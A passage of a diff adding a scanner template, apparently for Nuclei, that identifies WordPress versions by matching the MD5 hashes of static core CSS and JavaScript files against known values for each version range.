md5(body))" + - type: dsl + name: 4.5.1 - 4.5.23 + dsl: + - "(\"b1b633c181b3995b1702d6db1154e37c\" == md5(body))" + - type: dsl + name: 4.5 + dsl: + - "(\"e5554fe0fe4861016f210fcb3ba9de9c\" == md5(body))" + - type: dsl + name: 4.4 - 4.4.24 + dsl: + - "(\"8510f4975434100288bc363aaba2eaae\" == md5(body))" + - type: dsl + name: 4.3.1 - 4.3.25 + dsl: + - "(\"afc4c67509b5f5b52fd2b7556836b69c\" == md5(body))" + - type: dsl + name: 4.3 + dsl: + - "(\"ba5c8a35df3adc61f0c8abccd371c3fd\" == md5(body))" + - type: dsl + name: 4.2 - 4.2.29 + dsl: + - "(\"1e031c368742554084b13814a53c6261\" == md5(body))" + - type: dsl + name: 4.1 - 4.1.32 + dsl: + - "(\"90cc2e0760fa019d3429b601550c6430\" == md5(body))" + - type: dsl + name: 4.0 - 4.0.32 + dsl: + - "(\"b670d225181c91289ac6efb9809905d7\" == md5(body))" + - type: dsl + name: 3.9 - 3.9.33 + dsl: + - "(\"15ba49042f9c3070d2bc14798cbaa63d\" == md5(body))" + - type: dsl + name: 4.9 - 4.9.5 + dsl: + - "(\"f0d5f3037d3ef1d652c2a565ef67ecf1\" == md5(body))" + - type: dsl + name: 4.9.6 - 4.9.7 + dsl: + - "(\"b6f7e5f622295267ff78823f687e67ab\" == md5(body))" + - type: dsl + name: 4.9.8 - 5.0.11 + dsl: + - "(\"611310a2b7739d0e073cb88153237131\" == md5(body))" + - type: dsl + name: 5.1 - 5.2 + dsl: + - "(\"dcdd5a844af0f8e806e007c3890ba954\" == md5(body))" + - type: dsl + name: 5.2.1 - 5.2.9 + dsl: + - "(\"0a025aad30fc446433312fbfd7b41bde\" == md5(body))" + - type: dsl + name: 5.3 - 5.4.4 + dsl: + - "(\"6d4e3950e0b34d1b188c3c49a5604f00\" == md5(body))" + - type: dsl + name: 5.5 - 5.6 + dsl: + - "(\"eb5ecbdece73d7b68b0c7bb0fbde8932\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/tinymce/plugins/media/plugin.min.js" + matchers: + - type: dsl + name: 4.8 - 4.9.5 + dsl: + - "(\"b068d94458289ccfca5221fe750b4155\" == md5(body))" + - type: dsl + name: 4.7.4 - 4.7.19 + dsl: + - "(\"900194f71ef56cb47d027a61ed75c1c9\" == md5(body))" + - type: dsl + name: 4.6 - 4.7.3 + dsl: + - "(\"b15b0fedf40436964822d4c225e36bdb\" == md5(body))" + - type: dsl + name: 4.5.1 - 4.5.23 + dsl: + - "(\"2003f5361b31565d518006c48b649801\" == md5(body))" + - type: dsl + name: 4.5 + dsl: + - "(\"e729f9f1201575a9589363bcf7438cb0\" == md5(body))" + - type: dsl + name: 4.4 - 4.4.24 + dsl: + - "(\"a3befc9aed67d0169c87284c6c1a95e4\" == md5(body))" + - type: dsl + name: 4.3.1 - 4.3.25 + dsl: + - "(\"4c19cd169dac570c6d6675fa82a4f3e5\" == md5(body))" + - type: dsl + name: 4.3 + dsl: + - "(\"d88ec9908ef4412275ccff68861a41c7\" == md5(body))" + - type: dsl + name: 4.2 - 4.2.29 + dsl: + - "(\"7ac22f7e2e534de4364c1de8351b175c\" == md5(body))" + - type: dsl + name: 4.1 - 4.1.32 + dsl: + - "(\"54b12794da9f72eba7a1b7c742eef081\" == md5(body))" + - type: dsl + name: 4.0 - 4.0.32 + dsl: + - "(\"fb80dbf401770e6d2f8513cda0adb393\" == md5(body))" + - type: dsl + name: 3.9 - 3.9.33 + dsl: + - "(\"44b8f527be46fc591c55a1ef4e4c5781\" == md5(body))" + - type: dsl + name: 4.9.6 - 5.4.4 + dsl: + - "(\"111e5c52d4d0f2d41fc16f65884954bc\" == md5(body))" + - type: dsl + name: 5.5 - 5.6 + dsl: + - "(\"36ce270b0231ea5adefe919ec2661b20\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/tinymce/plugins/media/plugin.js" + matchers: + - type: dsl + name: 4.8 - 4.9.5 + dsl: + - "(\"a1f2c45f38a2581ec28d2f41f835a1a2\" == md5(body))" + - type: dsl + name: 4.7.4 - 4.7.19 + dsl: + - "(\"5ef80c55f07303af4e086692f247c1e9\" == md5(body))" + - type: dsl + name: 4.6 - 4.7.3 + dsl: + - "(\"0966da48749b6e089014a3782c329999\" == md5(body))" + - type: dsl + name: 4.5.1 - 4.5.23 + dsl: + - "(\"a75702d3522680cc2d408736ce18eec4\" == md5(body))" + - type: dsl + name: 4.5 + dsl: + - "(\"e54ed18bea6c2c6ae2fd1909987d2416\" == md5(body))" + - type: dsl + name: 4.4 - 4.4.24 + dsl: + - "(\"2a92c5eb43f95da660c4c58dc1aa2501\" == md5(body))" + - type: dsl + name: 4.3.1 - 4.3.25 + dsl: + - "(\"abba483f4f8fd4d1bb3883dfdbde63b9\" == md5(body))" + - type: dsl + name: 4.3 + dsl: + - "(\"1b56d9b064a6f1768301a2a33affd140\" == md5(body))" + - type: dsl + name: 4.2 - 4.2.29 + dsl: + - "(\"117eed22aeeccaa7a85ad2c2a5760a01\" == md5(body))" + - type: dsl + name: 4.0 - 4.1.32 + dsl: + - "(\"ca4167ce1c99086ae6f3155af8728d49\" == md5(body))" + - type: dsl + name: 3.9 - 3.9.33 + dsl: + - "(\"e1d4bfb8b0e0016a1a18599fefb5989e\" == md5(body))" + - type: dsl + name: 4.9.6 - 4.9.7 + dsl: + - "(\"537cacc621649c9c258110c56fd8d230\" == md5(body))" + - type: dsl + name: 4.9.8 - 5.0.11 + dsl: + - "(\"611679cf46c9710355e58818e6c9937f\" == md5(body))" + - type: dsl + name: 5.1 - 5.4.4 + dsl: + - "(\"077519f391906aea6aa945761a290b3b\" == md5(body))" + - type: dsl + name: 5.5 - 5.6 + dsl: + - "(\"df032317402cd90b340e016447bad44d\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-admin/css/login.css" + matchers: + - type: dsl + name: 4.8 - 4.8.15 + dsl: + - "(\"7518e2cdcfd5de19abc14cd014d073e7\" == md5(body))" + - type: dsl + name: 4.7 - 4.7.19 + dsl: + - "(\"e98aa1f1d14fd4fd2b80d456948b6262\" == md5(body))" + - type: dsl + name: 4.6 - 4.6.20 + dsl: + - "(\"01007fd412c09c53accf6b0e89f4477b\" == md5(body))" + - type: dsl + name: 4.5 - 4.5.23 + dsl: + - "(\"3f92632d9d94229a2f95af15593a8031\" == md5(body))" + - type: dsl + name: 4.4 - 4.4.24 + dsl: + - "(\"8e833f06a27688ee35e373d1cc7f2afc\" == md5(body))" + - type: dsl + name: 4.3 - 4.3.25 + dsl: + - "(\"61fcf1005a8af792f340f449f6a2c988\" == md5(body))" + - type: dsl + name: 4.2 - 4.2.29 + dsl: + - "(\"0e01b8fa9ea4487455a587c852b405c5\" == md5(body))" + - type: dsl + name: 4.1 - 4.1.32 + dsl: + - "(\"479122b088e353c76479d24bf10e7f27\" == md5(body))" + - type: dsl + name: 4.0 - 4.0.32 + dsl: + - "(\"25d100e4f308bdf6a25f51023529e0cb\" == md5(body))" + - type: dsl + name: 3.9 - 3.9.33 + dsl: + - "(\"e07ad8ce23db15420e3787dc08d415b0\" == md5(body))" + - type: dsl + name: 3.2.1 + dsl: + - "(\"af561b86efcd3c53a91ab4070b2c5bc4\" == md5(body))" + - type: dsl + name: 3.2 + dsl: + - "(\"02d549e3f066d130a5c6346d00529df5\" == md5(body))" + - type: dsl + name: 3.1 - 3.1.4 + dsl: + - "(\"5ee5919f129c64659aa586f39de0c9cc\" == md5(body))" + - type: dsl + name: 3.0 - 3.0.6 + dsl: + - "(\"bc30b85daead7b9e041fd7ec7d90700f\" == md5(body))" + - type: dsl + name: 2.9 - 2.9.2 + dsl: + - "(\"f760faa8361214a1830732827a566ff2\" == md5(body))" + - type: dsl + name: 2.8 - 2.8.6 + dsl: + - "(\"c6f1a4e8396191754e8043b78cc6e8b1\" == md5(body))" + - type: dsl + name: 2.7 - 2.7.1 + dsl: + - "(\"27a64401a3200b4df27feac7ac42a058\" == md5(body))" + - type: dsl + name: 2.5 - 2.6.5 + dsl: + - "(\"35913878f077f01b45a8d78abd2edacc\" == md5(body))" + - type: dsl + name: 4.9 - 4.9.5 + dsl: + - "(\"24fe47e6b276803d71f1ca40da9bbbfd\" == md5(body))" + - type: dsl + name: 4.9.6 - 5.0.11 + dsl: + - "(\"172dda34727301b786a0037bf6acf0af\" == md5(body))" + - type: dsl + name: 5.1 - 5.1.8 + dsl: + - "(\"9196f060238471f88c7afbd5ea4aaf08\" == md5(body))" + - type: dsl + name: 5.2 - 5.2.2 + dsl: + - "(\"debd3712345e6826f3c09830377622d4\" == md5(body))" + - type: dsl + name: 5.2.3 - 5.2.9 + dsl: + - "(\"59d610420f74a3c7b3c61ba3fb9456af\" == md5(body))" + - type: dsl + name: 5.3 - 5.3.6 + dsl: + - "(\"74eeb188296b161860ba9dbc08f57c54\" == md5(body))" + - type: dsl + name: 5.4 - 5.4.4 + dsl: + - "(\"100ac6af835f353443384ea8a4da1da7\" == md5(body))" + - type: dsl + name: 5.5 - 5.6 + dsl: + - "(\"5bf25641c9170715b0b6796baa9a708b\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-admin/js/edit-comments.js" + matchers: + - type: dsl + name: 4.8 - 4.8.15 + dsl: + - "(\"c9df035a5e3a22ed64ecbd389a442071\" == md5(body))" + - type: dsl + name: 4.6 - 4.7.19 + dsl: + - "(\"eabcc0c5e7d7a437b614fab4089a6810\" == md5(body))" + - type: dsl + name: 4.5 - 4.5.23 + dsl: + - "(\"f4d14807fae2e4f1be7f50934c4fe5c3\" == md5(body))" + - type: dsl + name: 4.4 - 4.4.24 + dsl: + - "(\"f68bc4e612b9b4887eca532e66687af4\" == md5(body))" + - type: dsl + name: 4.3.1 - 4.3.25 + dsl: + - "(\"302689cda1abde975e19e1230b455d29\" == md5(body))" + - type: dsl + name: 4.3 + dsl: + - "(\"e7e22b2197cc81ee0c5cf30460ede00f\" == md5(body))" + - type: dsl + name: 4.2 - 4.2.29 + dsl: + - "(\"f6947b28c386e3637c99d199c4a32a33\" == md5(body))" + - type: dsl + name: 4.0 - 4.1.32 + dsl: + - "(\"5a9fd1c52b9007ab3d2afbaa6f2dcf64\" == md5(body))" + - type: dsl + name: 3.9 - 3.9.33 + dsl: + - "(\"21cddaeefcf4085a03cb0279e3fa26be\" == md5(body))" + - type: dsl + name: 3.8 - 3.8.35 + dsl: + - "(\"fa6c396401a13d727d17409a38d3476e\" == md5(body))" + - type: dsl + name: 3.7 - 3.7.35 + dsl: + - "(\"88669276cac6721f2c39e4c7b09d9153\" == md5(body))" + - type: dsl + name: 3.5 - 3.6.1 + dsl: + - "(\"4447511c25d642d258d7b46cfd4ccf8d\" == md5(body))" + - type: dsl + name: 3.4 - 3.4.2 + dsl: + - "(\"4914c94a70fd5312d9f81037fd0143c3\" == md5(body))" + - type: dsl + name: 3.3 - 3.3.3 + dsl: + - "(\"7973341a787dfbee1b28a142be984a56\" == md5(body))" + - type: dsl + name: 3.2 - 3.2.1 + dsl: + - "(\"35c58396b20acee076ea01c9bf7e5663\" == md5(body))" + - type: dsl + name: 3.1 - 3.1.4 + dsl: + - "(\"31cbb52c961abeebfd37ab959b5547b5\" == md5(body))" + - type: dsl + name: 3.0 - 3.0.6 + dsl: + - "(\"23d3d79737a0fab3785a92caa7e55862\" == md5(body))" + - type: dsl + name: 2.9 - 2.9.2 + dsl: + - "(\"501d2e3f75455c53e270bcae6c0446ed\" == md5(body))" + - type: dsl + name: 2.8.1 - 2.8.6 + dsl: + - "(\"f1fb0174b531476f287709b0b9a523e3\" == md5(body))" + - type: dsl + name: 2.8 + dsl: + - "(\"cea7fcad6f59dceb354ea33628d67926\" == md5(body))" + - type: dsl + name: 2.7 - 2.7.1 + dsl: + - "(\"20ec1fe07984f6ada0845df97eb73a86\" == md5(body))" + - type: dsl + name: 2.5 - 2.6.5 + dsl: + - "(\"1d53ac0e3f5a8e83d97380b1b01cb19b\" == md5(body))" + - type: dsl + name: 2.3 - 2.3.3 + dsl: + - "(\"8b98dc81013e5510adde5c9280c410b6\" == md5(body))" + - type: dsl + name: 4.9 - 5.0.11 + dsl: + - "(\"a975fc736cdecddbfb9aed80699fb3af\" == md5(body))" + - type: dsl + name: 5.1 - 5.1.8 + dsl: + - "(\"62a823564a6191f21e412a42bda1e729\" == md5(body))" + - type: dsl + name: 5.2 - 5.2.9 + dsl: + - "(\"9a69064e1e7557587181bed581f88a4b\" == md5(body))" + - type: dsl + name: 5.3 - 5.3.6 + dsl: + - "(\"908f23515f075ea7d164a713282989ef\" == md5(body))" + - type: dsl + name: 5.4 - 5.4.4 + dsl: + - "(\"b81e08e13f223a62c250a6140be14e4b\" == md5(body))" + - type: dsl + name: 5.5 - 5.6 + dsl: + - "(\"2ef07d05d7aca6002e56cfbb39b73598\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-admin/css/install-rtl.min.css" + matchers: + - type: dsl + name: 4.7 - 4.8.15 + dsl: + - "(\"97e4d5c63a4bd3a4f073bba5dcab8ca6\" == md5(body))" + - type: dsl + name: 4.6 - 4.6.20 + dsl: + - "(\"7b493359000b7f086c19ac7dfec440a8\" == md5(body))" + - type: dsl + name: 4.5 - 4.5.23 + dsl: + - "(\"4a1bb49f35a84d27dc162b7a72c6d15d\" == md5(body))" + - type: dsl + name: 4.4 - 4.4.24 + dsl: + - "(\"bfb464d0c31eb556a824623537b0da3b\" == md5(body))" + - type: dsl + name: 4.3 - 4.3.25 + dsl: + - "(\"48140068d8f15c150fee36f905cd98f8\" == md5(body))" + - type: dsl + name: 4.2 - 4.2.29 + dsl: + - "(\"e3e8c235f96ea51104cde0104ae12010\" == md5(body))" + - type: dsl + name: 4.1 - 4.1.32 + dsl: + - "(\"f2197bc5fffd870815d914eccf767eb3\" == md5(body))" + - type: dsl + name: 4.0 - 4.0.32 + dsl: + - "(\"9ac5bd4bfdda52b4b9ed21f7f4ba23d8\" == md5(body))" + - type: dsl + name: 3.9 - 3.9.33 + dsl: + - "(\"48b3c809ddef2ab9a492a5797cae8087\" == md5(body))" + - type: dsl + name: 3.8.1 - 3.8.35 + dsl: + - "(\"3ed251ebb3fa879221a7ddaac4374a7b\" == md5(body))" + - type: dsl + name: 3.8 + dsl: + - "(\"35593db173c2dfce8b63f1a39f2eb3b7\" == md5(body))" + - type: dsl + name: 4.9 - 4.9.16 + dsl: + - "(\"0b2751d087519eff48ee76fa78a70961\" == md5(body))" + - type: dsl + name: 5.0 - 5.0.11 + dsl: + - "(\"fd0ebb2e5cb4a51dbd122659f4e88042\" == md5(body))" + - type: dsl + name: 5.1 - 5.2.2 + dsl: + - "(\"96bd054cdcf2aae77955a0d3d4654225\" == md5(body))" + - type: dsl + name: 5.2.3 - 5.2.9 + dsl: + - "(\"e896d069f831a48adac9fc01b74bfd84\" == md5(body))" + - type: dsl + name: 5.3 + dsl: + - "(\"a9bd89b5b0dfa63cd42cb75833ff3a3f\" == md5(body))" + - type: dsl + name: 5.3.1 - 5.3.2 + dsl: + - "(\"ecf3a0a1090fd8efb7c2a10e38a9a7f4\" == md5(body))" + - type: dsl + name: 5.3.3 - 5.4.4 + dsl: + - "(\"2bd6b9c1287ded9ed1e668959385119b\" == md5(body))" + - type: dsl + name: 5.5 - 5.6 + dsl: + - "(\"36065a28a39ea8533cf109bd86343f85\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-admin/css/install.min.css" + matchers: + - type: dsl + name: 4.7 - 4.8.15 + dsl: + - "(\"e95806e74d09390abc3dc7b8094cdeea\" == md5(body))" + - type: dsl + name: 4.6 - 4.6.20 + dsl: + - "(\"f651508c7103eca79f012b62fa6a5193\" == md5(body))" + - type: dsl + name: 4.5 - 4.5.23 + dsl: + - "(\"6306b90e2dc9778074653d97c72d1162\" == md5(body))" + - type: dsl + name: 4.4 - 4.4.24 + dsl: + - "(\"572e9e2e3d23c7b899a505bb16d5131a\" == md5(body))" + - type: dsl + name: 4.3 - 4.3.25 + dsl: + - "(\"06874217e7bf290a096fc10fc90a9a52\" == md5(body))" + - type: dsl + name: 4.2 - 4.2.29 + dsl: + - "(\"333fb17a509abf264fd13c529939608b\" == md5(body))" + - type: dsl + name: 4.1 - 4.1.32 + dsl: + - "(\"9fa7dcf54586c1d680cea67b449ffd88\" == md5(body))" + - type: dsl + name: 4.0 - 4.0.32 + dsl: + - "(\"a36308e272c9fbdbbd911ddaf399ba0b\" == md5(body))" + - type: dsl + name: 3.9 - 3.9.33 + dsl: + - "(\"58e017c07fbd95848ec5c98a4e182e85\" == md5(body))" + - type: dsl + name: 3.8.1 - 3.8.35 + dsl: + - "(\"f17819c6cfe216f51260cc6621439cc5\" == md5(body))" + - type: dsl + name: 3.8 + dsl: + - "(\"de9a85a063de74e38a9fd4cb41c2b0ce\" == md5(body))" + - type: dsl + name: 3.7 - 3.7.35 + dsl: + - "(\"873132014ec1c1918ee9fbc06e0de909\" == md5(body))" + - type: dsl + name: 3.5 - 3.6.1 + dsl: + - "(\"e4ed9e62c29a97ef0bcd2776b2403f3b\" == md5(body))" + - type: dsl + name: 4.9 - 4.9.16 + dsl: + - "(\"8bcad96ceb3df102985a7c59610548cd\" == md5(body))" + - type: dsl + name: 5.0 - 5.0.11 + dsl: + - "(\"4423dc9caa273de00b935fb0995270fb\" == md5(body))" + - type: dsl + name: 5.1 - 5.2.2 + dsl: + - "(\"0129db65db4c33e5a0449daf4ab89757\" == md5(body))" + - type: dsl + name: 5.2.3 - 5.2.9 + dsl: + - "(\"5fd8e3fbdecefd95081fcc49edef3e42\" == md5(body))" + - type: dsl + name: 5.3 + dsl: + - "(\"3a5c1eb7dd2e56931bb9757ddf31bce6\" == md5(body))" + - type: dsl + name: 5.3.1 - 5.3.2 + dsl: + - "(\"9be959e6bdbfb8d2cb06af706406265c\" == md5(body))" + - type: dsl + name: 5.3.3 - 5.4.4 + dsl: + - "(\"c1896d0a1d14cd707999a253d37ecc5f\" == md5(body))" + - type: dsl + name: 5.5 - 5.6 + dsl: + - "(\"fec5f52b672c4c9c1be7699a5ee9fcac\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/wp-lists.js" + matchers: + - type: dsl + name: 4.7 - 5.0.11 + dsl: + - "(\"a3ad4f080bd61da2b9f2f9390b1533d1\" == md5(body))" + - type: dsl + name: 4.6 - 4.6.20 + dsl: + - "(\"4b92734b4cccad235747a460a76ef528\" == md5(body))" + - type: dsl + name: 4.5 - 4.5.23 + dsl: + - "(\"99849a20c182bbc6ed8c6aa3fc241f8c\" == md5(body))" + - type: dsl + name: 3.9 - 4.4.24 + dsl: + - "(\"c54ced2e822b232f2ad8a5f34930386f\" == md5(body))" + - type: dsl + name: 3.8 - 3.8.35 + dsl: + - "(\"f20cbb755614c908fd94d4f1996c1fee\" == md5(body))" + - type: dsl + name: 3.7 - 3.7.35 + dsl: + - "(\"c7fa747b3e84baea1545a375324c6d12\" == md5(body))" + - type: dsl + name: 3.5 - 3.6.1 + dsl: + - "(\"87ce7e6067f829ba65df86fddb32bf5b\" == md5(body))" + - type: dsl + name: 3.4.2 + dsl: + - "(\"46e1341cd4ea49f31046f7d7962adc7f\" == md5(body))" + - type: dsl + name: 3.2 - 3.4.1 + dsl: + - "(\"f6ac8cbe225dfa6187ce56623e038faf\" == md5(body))" + - type: dsl + name: 3.1 - 3.1.4 + dsl: + - "(\"24ec3750dc03ef23cfea6293dd820779\" == md5(body))" + - type: dsl + name: 2.9 - 3.0.6 + dsl: + - "(\"3f1815338eff901c71d41eeac40e23a9\" == md5(body))" + - type: dsl + name: 2.8 - 2.8.6 + dsl: + - "(\"2dfd550d6f8fc069af07cbc3464f152a\" == md5(body))" + - type: dsl + name: 2.7 - 2.7.1 + dsl: + - "(\"6ebbd5ec178efc75ad50c9687a8fe39a\" == md5(body))" + - type: dsl + name: 2.6.1 - 2.6.5 + dsl: + - "(\"2415f11a68f436ce1b0a7de8fc59cae8\" == md5(body))" + - type: dsl + name: 2.5.1 - 2.6 + dsl: + - "(\"15fc925fd39bb496871e842b2a754c76\" == md5(body))" + - type: dsl + name: 2.5 + dsl: + - "(\"3f3d922461418335261f26c4f97931c1\" == md5(body))" + - type: dsl + name: 5.1 - 5.3.6 + dsl: + - "(\"cd817551314bafab7fcbee0bac282570\" == md5(body))" + - type: dsl + name: 5.4 - 5.4.4 + dsl: + - "(\"56404e3a0d0cf24460ddf0604524c77c\" == md5(body))" + - type: dsl + name: 5.5 - 5.6 + dsl: + - "(\"9d289d837cdaabecd1fd6aeb38b366e0\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-admin/js/postbox.js" + matchers: + - type: dsl + name: 4.7 - 5.0.11 + dsl: + - "(\"e3dfc3b71fefc8c6eb82df54e3460b53\" == md5(body))" + - type: dsl + name: 4.6 - 4.6.20 + dsl: + - "(\"b695c5dad26818aecad696768ad1bd75\" == md5(body))" + - type: dsl + name: 4.5 - 4.5.23 + dsl: + - "(\"865e4f8df693705b404c45fddc1bd65f\" == md5(body))" + - type: dsl + name: 4.4.1 - 4.4.24 + dsl: + - "(\"99602c14980c31323b6851d0c81280fd\" == md5(body))" + - type: dsl + name: 4.4 + dsl: + - "(\"626e31e5abab7aae41a74691d1185e69\" == md5(body))" + - type: dsl + name: 4.0 - 4.3.25 + dsl: + - "(\"87a08ca86f25ee997a627ce4a88ec359\" == md5(body))" + - type: dsl + name: 3.8 - 3.9.33 + dsl: + - "(\"7d4e28e6dbd4db0ea12ca2244d3ededd\" == md5(body))" + - type: dsl + name: 3.5 - 3.7.35 + dsl: + - "(\"7ea8bff0af625f7b182f4c0ed9c5b5a6\" == md5(body))" + - type: dsl + name: 3.4 - 3.4.2 + dsl: + - "(\"3833ce43a5347b4542e8a9a2a76d3079\" == md5(body))" + - type: dsl + name: 3.3 - 3.3.3 + dsl: + - "(\"fc68948c4bc93d343b8c518d511cac08\" == md5(body))" + - type: dsl + name: 3.2 - 3.2.1 + dsl: + - "(\"a2ff73ebf42590213238b50ca66bbaca\" == md5(body))" + - type: dsl + name: 2.9 - 3.1.4 + dsl: + - "(\"7fa761c7425ce79babb4d790dcea367e\" == md5(body))" + - type: dsl + name: 2.8.1 - 2.8.6 + dsl: + - "(\"9bbabda30eba2bf23c9c9cd3b6afec1f\" == md5(body))" + - type: dsl + name: 2.8 + dsl: + - "(\"5834e331f60318d3f00b919ccf515e3a\" == md5(body))" + - type: dsl + name: 2.7 - 2.7.1 + dsl: + - "(\"7eb1fe696add412bac5e250b3e7f572c\" == md5(body))" + - type: dsl + name: 2.5 - 2.6.5 + dsl: + - "(\"8421d4a0813473667bac239989a2fc90\" == md5(body))" + - type: dsl + name: 5.1 - 5.3.6 + dsl: + - "(\"dfa3d2ab3f0caa20db92a24bcc0ff904\" == md5(body))" + - type: dsl + name: 5.4 - 5.4.4 + dsl: + - "(\"903af8df66abaa627fe19f99d04d3e7e\" == md5(body))" + - type: dsl + name: 5.5 - 5.6 + dsl: + - "(\"2f6fd3d7eafc412d3769897be1d35cc5\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-admin/js/plugin-install.js" + matchers: + - type: dsl + name: 4.6 - 4.8.15 + dsl: + - "(\"b606cf2ba06353b0e383e36b4bd19a30\" == md5(body))" + - type: dsl + name: 4.5 - 4.5.23 + dsl: + - "(\"9570431e7a6293435a1592a995fcb11f\" == md5(body))" + - type: dsl + name: 4.4 - 4.4.24 + dsl: + - "(\"0329aac46a64c9a9453694353cd176b0\" == md5(body))" + - type: dsl + name: 4.3 - 4.3.25 + dsl: + - "(\"684877d319a91f3766e4474a60b99b9a\" == md5(body))" + - type: dsl + name: 4.2 - 4.2.29 + dsl: + - "(\"90585237ad358716313a1f5d9b9353b9\" == md5(body))" + - type: dsl + name: 4.0 - 4.1.32 + dsl: + - "(\"2e2deb24835a5f6c5259690d775a2324\" == md5(body))" + - type: dsl + name: 3.9 - 3.9.33 + dsl: + - "(\"6c01acc3ccd0bbdee1c9d1f31d8cb2be\" == md5(body))" + - type: dsl + name: 3.8 - 3.8.35 + dsl: + - "(\"8505a21ad5b4c96db865a6208bd0d017\" == md5(body))" + - type: dsl + name: 3.6 - 3.7.35 + dsl: + - "(\"69fdd35fdcf30104974cfd8abba8fe0b\" == md5(body))" + - type: dsl + name: 3.5 - 3.5.2 + dsl: + - "(\"45050658679cde23b3e31be7de31e526\" == md5(body))" + - type: dsl + name: 3.1 - 3.4.2 + dsl: + - "(\"16ba1352fa10398697d8abdbeb096894\" == md5(body))" + - type: dsl + name: 3.0 - 3.0.6 + dsl: + - "(\"4622152410d656cd0384bf480521150f\" == md5(body))" + - type: dsl + name: 2.8 - 2.9.2 + dsl: + - "(\"62abb0285535502328c0cf33f5a3db63\" == md5(body))" + - type: dsl + name: 2.7.1 + dsl: + - "(\"6d35bcfe2573200a1349a95b8234c411\" == md5(body))" + - type: dsl + name: 2.7 + dsl: + - "(\"ba82272c84110566e42d32c99897b48f\" == md5(body))" + - type: dsl + name: 4.9 - 4.9.1 + dsl: + - "(\"5a56a4f83e069ec401c545d97b03c03d\" == md5(body))" + - type: dsl + name: 4.9.2 - 5.0.11 + dsl: + - "(\"111082709bd5b31ec3f6230dcbc2c453\" == md5(body))" + - type: dsl + name: 5.1 - 5.3.6 + dsl: + - "(\"0e91417b2af13f8c8dcd183146051cab\" == md5(body))" + - type: dsl + name: 5.4 - 5.4.4 + dsl: + - "(\"87f424ec96a8076fa69ed5ca77a48051\" == md5(body))" + - type: dsl + name: 5.5 - 5.6 + dsl: + - "(\"f85da534dfaa752cc62b3ae45eaf3a3b\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-admin/js/editor-expand.js" + matchers: + - type: dsl + name: 4.7 - 4.8.15 + dsl: + - "(\"c7d8e24f4c208108b7caf2df88d9b54a\" == md5(body))" + - type: dsl + name: 4.6.1 - 4.6.20 + dsl: + - "(\"e7b93fd7ead47026c1becc24527031cb\" == md5(body))" + - type: dsl + name: 4.6 + dsl: + - "(\"bc3aaa870920e8272d795377983284e6\" == md5(body))" + - type: dsl + name: 4.5 - 4.5.23 + dsl: + - "(\"a83f982e5c5f7847ae809681d17982c6\" == md5(body))" + - type: dsl + name: 4.4 - 4.4.24 + dsl: + - "(\"e5803492f3d1bf76d8a84775ccc20dd6\" == md5(body))" + - type: dsl + name: 4.2.2 - 4.3.25 + dsl: + - "(\"001eee141532f8fc1fac023dbb945a92\" == md5(body))" + - type: dsl + name: 4.2 - 4.2.1 + dsl: + - "(\"4f5ffbf8ea97f6a5399e9b4799da6b47\" == md5(body))" + - type: dsl + name: 4.1 - 4.1.32 + dsl: + - "(\"2f37f221b8f77ae0e6bbde7b8d03fe43\" == md5(body))" + - type: dsl + name: 4.0.1 - 4.0.32 + dsl: + - "(\"d8bf6b8ad0222c5c81abe3445397afb3\" == md5(body))" + - type: dsl + name: 4.0 + dsl: + - "(\"404895c4518505935866c5eb11047c30\" == md5(body))" + - type: dsl + name: 4.9 - 5.0.11 + dsl: + - "(\"88a83136db40e8e8b93f230a6712ea54\" == md5(body))" + - type: dsl + name: 5.1 - 5.1.8 + dsl: + - "(\"8b2a23ce701d653e25093ee43c221b8a\" == md5(body))" + - type: dsl + name: 5.2 - 5.3.6 + dsl: + - "(\"beab9e6566d2ec701c27bccd8322b2c8\" == md5(body))" + - type: dsl + name: 5.4 - 5.4.4 + dsl: + - "(\"95ceb9fdb83330b51162d8db3e3a214b\" == md5(body))" + - type: dsl + name: 5.5 - 5.6 + dsl: + - "(\"91a417834bc4155c28b08270bda9b25b\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/tinymce/plugins/wordpress/plugin.min.js" + matchers: + - type: dsl + name: 4.8.1 - 4.8.15 + dsl: + - "(\"97336cf7d88da1e9c142069d76f11c23\" == md5(body))" + - type: dsl + name: 4.8 + dsl: + - "(\"13b554d6a123f78c5cb3b601c24c0e09\" == md5(body))" + - type: dsl + name: 4.7.4 - 4.7.19 + dsl: + - "(\"12f8cfc114d4644e0a8dcb4784a63a79\" == md5(body))" + - type: dsl + name: 4.7 - 4.7.3 + dsl: + - "(\"20c2ac6dc65464192456606dae06eae4\" == md5(body))" + - type: dsl + name: 4.6 - 4.6.20 + dsl: + - "(\"49fb4126ed9cfd4b7509019a7490acb0\" == md5(body))" + - type: dsl + name: 4.5.3 - 4.5.23 + dsl: + - "(\"1618d0c7936444db76f6676767a8d743\" == md5(body))" + - type: dsl + name: 4.5 - 4.5.2 + dsl: + - "(\"27b3b159d15842fe85708bb9fcfee677\" == md5(body))" + - type: dsl + name: 4.4 - 4.4.24 + dsl: + - "(\"b46f4f2afbda7e481b420a8ee19c7406\" == md5(body))" + - type: dsl + name: 4.3 - 4.3.25 + dsl: + - "(\"6e47a30fdc90cb4b42de68acf864c71a\" == md5(body))" + - type: dsl + name: 4.2.2 - 4.2.29 + dsl: + - "(\"26da4266c11d1a0eea6ebf1360b815d4\" == md5(body))" + - type: dsl + name: 4.2 - 4.2.1 + dsl: + - "(\"78f1d835b79b5db9bd86cd7cf15d22ff\" == md5(body))" + - type: dsl + name: 4.1.5 - 4.1.32 + dsl: + - "(\"890c56f7df87f0b1ecd96e2068f60dd0\" == md5(body))" + - type: dsl + name: 4.1 - 4.1.4 + dsl: + - "(\"f7cc436db8ef131f0d0543bc729bf1b1\" == md5(body))" + - type: dsl + name: 4.0.5 - 4.0.32 + dsl: + - "(\"994a37d7ed6d3711130b74ac05f554a7\" == md5(body))" + - type: dsl + name: 4.0 - 4.0.4 + dsl: + - "(\"2e75ba1f0636242ddc242c5043816052\" == md5(body))" + - type: dsl + name: 3.9.6 - 3.9.33 + dsl: + - 